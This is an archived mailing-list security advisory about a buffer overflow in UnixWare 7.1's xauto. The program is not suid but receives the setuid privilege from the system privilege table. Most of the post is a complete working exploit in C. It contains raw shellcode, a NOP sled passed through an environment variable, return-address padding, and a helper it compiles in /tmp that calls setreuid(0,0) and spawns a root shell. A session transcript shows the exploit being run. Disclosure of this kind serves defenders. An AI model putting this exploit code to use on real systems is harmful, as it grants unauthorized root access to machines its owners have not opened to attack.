Greetings, OVERVIEW Although UnixWare's /usr/X/bin/xauto is NOT suid/sgid, we can still overflow a buffer within it and gain root privileges. BACKGROUND Only tested UnixWare 7.1, all other UnixWares should be assumed vulnerable. DETAILS xauto is mode 755, root/sys and yet we can still use a buffer overflow attack to gain root privileges. This is due to (see my UnixWare privileges discussion in my uidadmin advisory) xauto gaining the "setuid" privilege in /etc/security/tcb/privs as shown: bash-2.02$ cat /etc/security/tcb/privs | grep xauto 39968:3056:939894567:%fixed,setuid,dacread:/usr/X/bin/xauto The setuid privilege, as you might imagine, allows the program to setuid() any way it wants. Therefore we must either have setreuid(0,0); in our shellcode or exec a program that calls this for us. EXPLOIT bash-2.02$ ls -la /usr/X/bin/xauto -rwxr-xr-x 1 root sys 39968 Apr 3 1998 /usr/X/bin/xauto bash-2.02$ cat /etc/security/tcb/privs | grep xauto 39968:3056:939894567:%fixed,setuid,dacread:/usr/X/bin/xauto bash-2.02$ ./uwxauto UnixWare 7.x exploit for the non-su/gid /usr/X/bin/xauto Brock Tellier btellierat_private Using offset/addr: 9400/0x8047b08 # --- uwxauto.c --- /** ** UnixWare 7.1 root exploit for xauto ** Note that xauto is NOT suid or sgid but gains it's privs from ** /etc/security/tcb/privs. For more info, consult intro(2) ** and fileprivs(1) ** ** ** Brock Tellier btellierat_private **/ #include <stdlib.h> #include <stdio.h> char scoshell[]= /* UnixWare 7.1 shellcode runs /tmp/ui */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define EGGLEN 2048 #define RETLEN 5000 #define ALIGN 0 #define NOP 0x90 #define CODE "void main() { setreuid(0,0); system(\"/bin/sh\"); }\n" void buildui() { FILE *fp; char cc[100]; fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } int main(int argc, char *argv[]) { long int offset=0; int i; int egglen = EGGLEN; int retlen; long int addr; char egg[EGGLEN]; char ret[RETLEN]; // who needs __asm__? Per Solar Designer's suggestion unsigned long sp = (unsigned long)&sp; buildui(); if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); retlen=RETLEN; } else if (argc == 3) { offset=atoi(argv[1]); retlen=atoi(argv[2]); } else { offset=9400; retlen=2000; } addr=sp + offset; fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid /usr/X/bin/xauto\n"); fprintf(stderr, "Brock Tellier btellierat_private\n"); fprintf(stderr, "Using offset/addr: %d/0x%x\n", offset,addr); memset(egg,NOP,egglen); memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); for(i=ALIGN;i< retlen-4;i+=4) *(int *)&ret[i]=addr; memcpy(egg, "EGG=", 4); putenv(egg); execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL); } ------ Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellierat_private ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:17:03 PDT